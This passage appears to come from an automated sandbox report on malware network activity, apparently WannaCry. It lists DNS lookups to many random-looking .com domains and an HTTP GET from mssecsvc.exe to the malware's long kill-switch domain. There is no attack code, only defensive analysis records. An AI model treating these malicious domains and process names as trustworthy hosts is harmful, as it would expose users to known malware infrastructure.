                                                                                                                                              Jul 23, 2022 01:46:40.591535091 CEST53646248.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:46:40.631556034 CEST53644128.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.370409966 CEST53506088.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.438143015 CEST53542058.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.466941118 CEST53627568.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.525947094 CEST53584978.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.570406914 CEST53627018.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.602948904 CEST53535248.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.667927027 CEST53585618.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.702151060 CEST53615558.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.760199070 CEST53644338.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:01.956505060 CEST53625478.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:02.072362900 CEST53540968.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:02.710213900 CEST53578298.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:02.776103020 CEST53633268.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:02.823795080 CEST53601108.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:02.869498014 CEST53492308.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:22.991107941 CEST53515578.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.045885086 CEST53653348.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.078193903 CEST53524878.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.109165907 CEST53519948.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.141596079 CEST53516588.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.170037985 CEST53589508.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.201833010 CEST53538838.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.233378887 CEST53590658.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.282629967 CEST53556868.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.315304995 CEST53645898.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.360740900 CEST53649348.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.387505054 CEST53557958.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.417743921 CEST53646358.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:23.447746992 CEST53552698.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.548820972 CEST53583948.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.598320961 CEST53497758.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.637161016 CEST53601958.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.744357109 CEST53551978.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.775826931 CEST53522528.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.804905891 CEST53588198.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.834836006 CEST53606978.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.866971970 CEST53519668.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.901011944 CEST53543068.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.928611040 CEST53500628.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.964001894 CEST53508698.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:43.995520115 CEST53497678.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:44.023190022 CEST53614818.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:47:44.068478107 CEST53503868.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:04.174994946 CEST53529838.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.243530989 CEST6386353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.271245003 CEST53638638.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.274849892 CEST5237253192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.302478075 CEST53523728.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.305587053 CEST5663653192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.343332052 CEST53566368.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.345632076 CEST5338453192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.371479034 CEST53533848.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.372735977 CEST5604953192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.406917095 CEST53560498.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.408293962 CEST5671453192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.440026045 CEST53567148.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.441627026 CEST5107353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.469676971 CEST53510738.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.474066019 CEST5623953192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.582082987 CEST53562398.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.584391117 CEST5875353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.613313913 CEST53587538.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.615626097 CEST6473353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.641983986 CEST53647338.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.644412994 CEST6359153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.672591925 CEST53635918.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.673917055 CEST5987953192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.707659960 CEST53598798.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.709907055 CEST6021253192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.737694025 CEST53602128.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.741451025 CEST5117253192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.777004004 CEST53511728.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.779268980 CEST5189353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.808573008 CEST53518938.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.810216904 CEST6262353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.840200901 CEST53626238.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.841921091 CEST6380153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.870671034 CEST53638018.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.871877909 CEST5460253192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.919764996 CEST53546028.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.921464920 CEST5155553192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.947329998 CEST53515558.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.951208115 CEST6314153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.996172905 CEST53631418.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.997474909 CEST6318153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:25.045352936 CEST53631818.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:25.048187017 CEST5299753192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:25.155997038 CEST53529978.8.8.8192.168.2.3

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                              Jul 23, 2022 01:44:23.724916935 CEST192.168.2.38.8.8.80xbe37Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:05.482811928 CEST192.168.2.38.8.8.80xfa63Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.243530989 CEST192.168.2.38.8.8.80xd3d1Standard query (0)fosajt.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.274849892 CEST192.168.2.38.8.8.80xad7Standard query (0)liamse.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.305587053 CEST192.168.2.38.8.8.80x7bd5Standard query (0)boqbzc.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.345632076 CEST192.168.2.38.8.8.80x3635Standard query (0)xyzrpb.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.372735977 CEST192.168.2.38.8.8.80x424Standard query (0)phirwq.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.408293962 CEST192.168.2.38.8.8.80x699bStandard query (0)tvmwem.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.441627026 CEST192.168.2.38.8.8.80x5109Standard query (0)wfuinm.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.474066019 CEST192.168.2.38.8.8.80x6ca5Standard query (0)abeaay.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.584391117 CEST192.168.2.38.8.8.80x29bStandard query (0)qavmrl.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.615626097 CEST192.168.2.38.8.8.80xe8c0Standard query (0)joddge.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.644412994 CEST192.168.2.38.8.8.80xe259Standard query (0)exiuuy.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.673917055 CEST192.168.2.38.8.8.80x3503Standard query (0)bauied.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.709907055 CEST192.168.2.38.8.8.80x818eStandard query (0)dpoead.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.741451025 CEST192.168.2.38.8.8.80x1da8Standard query (0)tpmtiw.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.779268980 CEST192.168.2.38.8.8.80xcbf5Standard query (0)glutbe.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.810216904 CEST192.168.2.38.8.8.80x2f9dStandard query (0)hmpjac.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.841921091 CEST192.168.2.38.8.8.80xf9d9Standard query (0)xgxizm.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.871877909 CEST192.168.2.38.8.8.80xd72bStandard query (0)trptke.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.921464920 CEST192.168.2.38.8.8.80xab65Standard query (0)tgvyjo.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.951208115 CEST192.168.2.38.8.8.80x413fStandard query (0)otoagh.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.997474909 CEST192.168.2.38.8.8.80x9c40Standard query (0)ihepfj.comA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:25.048187017 CEST192.168.2.38.8.8.80x1288Standard query (0)quydys.comA (IP address)IN (0x0001)

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                              Jul 23, 2022 01:44:23.746457100 CEST8.8.8.8192.168.2.30xbe37No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:44:23.746457100 CEST8.8.8.8192.168.2.30xbe37No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:05.504637003 CEST8.8.8.8192.168.2.30xfa63No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:05.504637003 CEST8.8.8.8192.168.2.30xfa63No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.549423933 CEST8.8.8.8192.168.2.30x8caaName error (3)kuwazq.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.604020119 CEST8.8.8.8192.168.2.30x1c0cName error (3)mbxpjh.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.635500908 CEST8.8.8.8192.168.2.30x7918Name error (3)cudiqm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.684672117 CEST8.8.8.8192.168.2.30x8a18Name error (3)uatacq.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.712487936 CEST8.8.8.8192.168.2.30xaad2Name error (3)wufhfo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.753336906 CEST8.8.8.8192.168.2.30xaae4Name error (3)pnuoyg.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.809433937 CEST8.8.8.8192.168.2.30xcb48Name error (3)exevye.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.859280109 CEST8.8.8.8192.168.2.30x3a3fName error (3)rchrgb.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.890558004 CEST8.8.8.8192.168.2.30x1f21Name error (3)aoulrr.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.927709103 CEST8.8.8.8192.168.2.30x23adName error (3)fudevu.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:39.967245102 CEST8.8.8.8192.168.2.30x6255Name error (3)iireby.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.000349045 CEST8.8.8.8192.168.2.30x290aName error (3)qmehuz.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.043453932 CEST8.8.8.8192.168.2.30x8f00Name error (3)wnzgoe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.078761101 CEST8.8.8.8192.168.2.30xd1e9Name error (3)btkcso.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.106173992 CEST8.8.8.8192.168.2.30xc08aName error (3)qgbuwt.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.143222094 CEST8.8.8.8192.168.2.30xa2e2Name error (3)enqgsr.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.173316956 CEST8.8.8.8192.168.2.30x9d53Name error (3)iooaeg.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.201761961 CEST8.8.8.8192.168.2.30xe16cName error (3)olieyo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.252249002 CEST8.8.8.8192.168.2.30x43b0Name error (3)djtidt.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.285356998 CEST8.8.8.8192.168.2.30xd53eName error (3)lcogil.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.323287010 CEST8.8.8.8192.168.2.30x5cc0Name error (3)mvnywi.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.364543915 CEST8.8.8.8192.168.2.30x3b13Name error (3)rffriz.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.393420935 CEST8.8.8.8192.168.2.30xe8ffName error (3)fuejrn.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.427232981 CEST8.8.8.8192.168.2.30x2830Name error (3)qmimjr.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.471981049 CEST8.8.8.8192.168.2.30x1025Name error (3)cixudc.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.500582933 CEST8.8.8.8192.168.2.30xb82bName error (3)chlntf.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.546382904 CEST8.8.8.8192.168.2.30x2c1eName error (3)youdqa.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.591535091 CEST8.8.8.8192.168.2.30x1491Name error (3)iremdw.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:46:40.631556034 CEST8.8.8.8192.168.2.30x448cName error (3)smezbn.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.370409966 CEST8.8.8.8192.168.2.30xbd79Name error (3)ysvfez.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.438143015 CEST8.8.8.8192.168.2.30x67a5Name error (3)kfgoeu.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.466941118 CEST8.8.8.8192.168.2.30x513Name error (3)uyjpue.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.525947094 CEST8.8.8.8192.168.2.30x1e00Name error (3)eymtmi.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.570406914 CEST8.8.8.8192.168.2.30xa623Name error (3)vgemhe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.602948904 CEST8.8.8.8192.168.2.30x93beName error (3)bnwzie.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.667927027 CEST8.8.8.8192.168.2.30xfc6Name error (3)clpivo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.702151060 CEST8.8.8.8192.168.2.30x5fe8Name error (3)qoumtu.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.760199070 CEST8.8.8.8192.168.2.30xe647Name error (3)cerbyj.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:01.956505060 CEST8.8.8.8192.168.2.30xa2c5Name error (3)uaqjzn.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:02.072362900 CEST8.8.8.8192.168.2.30x3606Name error (3)ahanjw.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:02.710213900 CEST8.8.8.8192.168.2.30xfd96Name error (3)dzbyvr.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:02.776103020 CEST8.8.8.8192.168.2.30x345aName error (3)ktceha.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:02.823795080 CEST8.8.8.8192.168.2.30xd51cName error (3)ureefd.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:02.869498014 CEST8.8.8.8192.168.2.30x1532Name error (3)jiarfr.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:22.991107941 CEST8.8.8.8192.168.2.30xe73Name error (3)uxcrve.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.045885086 CEST8.8.8.8192.168.2.30xf9d3Name error (3)oezaau.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.078193903 CEST8.8.8.8192.168.2.30xfb15Name error (3)toxthr.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.109165907 CEST8.8.8.8192.168.2.30x5ee3Name error (3)paelui.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.141596079 CEST8.8.8.8192.168.2.30x6f2eName error (3)aaeyfv.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.170037985 CEST8.8.8.8192.168.2.30x1862Name error (3)xeefyh.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.201833010 CEST8.8.8.8192.168.2.30xb28Name error (3)qtnarp.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.233378887 CEST8.8.8.8192.168.2.30xbc13Name error (3)eeauou.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.282629967 CEST8.8.8.8192.168.2.30xd3e7Name error (3)niongj.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.315304995 CEST8.8.8.8192.168.2.30x8d6eName error (3)akeofy.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.360740900 CEST8.8.8.8192.168.2.30x979dName error (3)dnirke.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.387505054 CEST8.8.8.8192.168.2.30x87faName error (3)lanclm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.417743921 CEST8.8.8.8192.168.2.30x9135Name error (3)egrbjv.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:23.447746992 CEST8.8.8.8192.168.2.30xf1eaName error (3)wlnmvm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.548820972 CEST8.8.8.8192.168.2.30x23f8Name error (3)dvnexx.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.598320961 CEST8.8.8.8192.168.2.30xc46cName error (3)zyjedf.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.637161016 CEST8.8.8.8192.168.2.30x3ceName error (3)pxunuy.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.744357109 CEST8.8.8.8192.168.2.30xa97aName error (3)uplveo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.775826931 CEST8.8.8.8192.168.2.30x97eaName error (3)rjirxk.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.804905891 CEST8.8.8.8192.168.2.30xbaa5Name error (3)otidym.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.834836006 CEST8.8.8.8192.168.2.30x609aName error (3)veqbbn.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.866971970 CEST8.8.8.8192.168.2.30xef1eName error (3)seyuei.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.901011944 CEST8.8.8.8192.168.2.30x1384Name error (3)wcxezu.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.928611040 CEST8.8.8.8192.168.2.30x2fb9Name error (3)jwbsjo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.964001894 CEST8.8.8.8192.168.2.30xe415Name error (3)uagfvy.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.995520115 CEST8.8.8.8192.168.2.30xaccbName error (3)poydst.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:44.023190022 CEST8.8.8.8192.168.2.30xe9b1Name error (3)pangeq.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:44.068478107 CEST8.8.8.8192.168.2.30x952fName error (3)atvhio.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:04.174994946 CEST8.8.8.8192.168.2.30x4a10Name error (3)vwfgtb.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.271245003 CEST8.8.8.8192.168.2.30xd3d1Name error (3)fosajt.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.302478075 CEST8.8.8.8192.168.2.30xad7Name error (3)liamse.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.343332052 CEST8.8.8.8192.168.2.30x7bd5Name error (3)boqbzc.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.371479034 CEST8.8.8.8192.168.2.30x3635Name error (3)xyzrpb.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.406917095 CEST8.8.8.8192.168.2.30x424Name error (3)phirwq.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.440026045 CEST8.8.8.8192.168.2.30x699bName error (3)tvmwem.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.469676971 CEST8.8.8.8192.168.2.30x5109Name error (3)wfuinm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.582082987 CEST8.8.8.8192.168.2.30x6ca5Name error (3)abeaay.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.613313913 CEST8.8.8.8192.168.2.30x29bName error (3)qavmrl.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.641983986 CEST8.8.8.8192.168.2.30xe8c0Name error (3)joddge.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.672591925 CEST8.8.8.8192.168.2.30xe259Name error (3)exiuuy.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.707659960 CEST8.8.8.8192.168.2.30x3503Name error (3)bauied.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.737694025 CEST8.8.8.8192.168.2.30x818eName error (3)dpoead.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.777004004 CEST8.8.8.8192.168.2.30x1da8Name error (3)tpmtiw.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.808573008 CEST8.8.8.8192.168.2.30xcbf5Name error (3)glutbe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.840200901 CEST8.8.8.8192.168.2.30x2f9dName error (3)hmpjac.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.870671034 CEST8.8.8.8192.168.2.30xf9d9Name error (3)xgxizm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.919764996 CEST8.8.8.8192.168.2.30xd72bName error (3)trptke.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.947329998 CEST8.8.8.8192.168.2.30xab65Name error (3)tgvyjo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.996172905 CEST8.8.8.8192.168.2.30x413fName error (3)otoagh.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:25.045352936 CEST8.8.8.8192.168.2.30x9c40Name error (3)ihepfj.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:25.155997038 CEST8.8.8.8192.168.2.30x1288Name error (3)quydys.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              0192.168.2.349740104.16.173.8080C:\Windows\mssecsvc.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jul 23, 2022 01:44:23.822949886 CEST1009OUTGET / HTTP/1.1
                                                                                                                                              Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                                                                                                              Cache-Control: no-cache
